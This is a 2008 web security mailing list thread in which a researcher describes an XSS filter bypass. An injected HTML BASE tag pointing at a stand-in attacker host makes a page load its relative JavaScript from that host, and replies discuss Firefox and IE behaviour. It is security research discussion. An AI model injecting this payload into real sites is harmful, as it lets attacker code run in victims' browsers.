Re: [WEB SECURITY] Nice little XSS trick

["James Landis" <jcl24@xxxxxxxxxxx>]

Sounds like this could be due to the difference between Strict and
Quirks mode rendering.

On Tue, Jul 15, 2008 at 10:00 AM, Prasad Shenoy <prasad.shenoy@xxxxxxxxx> wrote:
> Definitely. Inserting <base> tag in <body> of an HTML document works
> in Firefox 2.0.0.15
>
> Thanks
> Prasad Shenoy
>
> On Tue, Jul 15, 2008 at 1:50 PM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>> Prasad Shenoy wrote:
>>>
>>> Amit -
>>>
>>> When you say observed by FF 2, I guess you mean this should not work
>>> in FF 2 correct? But it works with FF 2.
>>>
>>
>> When I tested it, FF 2 ignored BASE tags outside the HEAD section (if you
>> have information to the contrary, please share). That doesn't mean the
>> attack completely fails - it means that the injection point must be inside
>> the HEAD section (less common, but may still happen).
>>
>>> As this is a very simple example, I would like to believe that you are
>>> assuming that in order to invoke functions from the attacker
>>> controlled JS file (because there is no JS involved in the payload),
>>> the attacker would create a file with the same filename and function
>>> names as the one on the victim's domain. This way the actual (good) JS
>>> file will be overwritten by the attacker controlled JS and all the
>>> functions will be called from cross domain.
>>>
>>
>> Exactly.
>>
>> -Amit
>>
>>
>>> Valid?
>>>
>>> Thanks
>>> Prasad Shenoy
>>>
>>> Prasad Shenoy
>>> On Tue, Jul 15, 2008 at 7:33 AM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>>>
>>>>
>>>> Hi list
>>>>
>>>> Recently I've been thinking about bypassing anti-XSS filters, and a nice
>>>> little trick occurred to me, which I haven't seen anywhere (e.g. it's not
>>>> on
>>>> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
>>>> BASe, but not the trick I describe here). The idea is to use the HTML
>>>> BASE
>>>> tag to force loading of JS code from the attacker's host. Consider a page
>>>> with XSS vulnerability such as:
>>>>
>>>> <html>
>>>> ...
>>>> ***XSS code may be embedded here***
>>>> ...
>>>> <script src="/foo/bar.js"></script>
>>>> ...
>>>> </html>
>>>>
>>>> Now, an attacker can inject <base href="http://www.attacker.tld/";>, and
>>>> next
>>>> thing you know, the browser (IE, at least) loads the JS from
>>>> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
>>>> "explicit" JS code involved in the payload itself.
>>>>
>>>> Note that according to the HTML standard, BASE should be placed in the
>>>> HEAD
>>>> section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This
>>>> is
>>>> indeed observed by FF 2, but not by IE (checked IE6).
>>>>
>>>> Thanks,
>>>> -Amit
>>>>
>>>>
>>>>
>>>> ----------------------------------------------------------------------------
>>>> Join us on IRC: irc.freenode.net #webappsec
>>>>
>>>> Have a question? Search The Web Security Mailing List Archives:
>>>> http://www.webappsec.org/lists/websecurity/archive/
>>>>
>>>> Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS
>>>> Feed]
>>>>
>>>> Join WASC on LinkedIn
>>>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>>>
>>>>
>>>>
>>>
>>>
>>>
>>>
>>
>>
>
>
>
> --
> Ah! the joy of hacking....
>
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>
>

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA